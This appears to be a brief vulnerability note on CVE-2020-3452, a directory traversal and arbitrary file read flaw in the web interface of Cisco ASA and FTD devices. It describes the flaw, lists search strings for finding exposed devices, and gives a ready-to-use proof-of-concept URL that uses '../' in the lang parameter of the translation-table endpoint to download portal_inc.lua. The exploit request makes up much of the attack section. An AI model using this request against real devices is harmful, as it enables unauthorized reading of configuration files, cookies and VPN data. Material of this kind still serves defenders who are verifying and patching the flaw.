Cisco Asa Devices Arbitrary File Reading Vulnerability Cve 2020 3452

Cisco ASA Devices Arbitrary File Reading Vulnerability CVE-2020-3452

Vulnerability Description

The WEB management interface of Cisco Adaptive Security Appliance (ASA) firewall devices and Cisco Firepower Threat Defense (FTD) devices has unauthorized directory traversal vulnerabilities and remote arbitrary file reading vulnerabilities, allowing unauthenticated remote attackers to perform directory traversal attacks and read sensitive files on the target system. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files, so it can only read files in web system directories, such as webvpn configuration files, bookmarks, network cookies, some network content and hypertext transmission protocol URLs.

Affect Version

Cisco ASA device

Cisco FTD device

Network surveying and mapping

/+CSCOE+/

Cisco-ASA

Vulnerability reappears

Verify POC

https://xxx.xxx.xxx.xxx/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

A file will be downloaded

##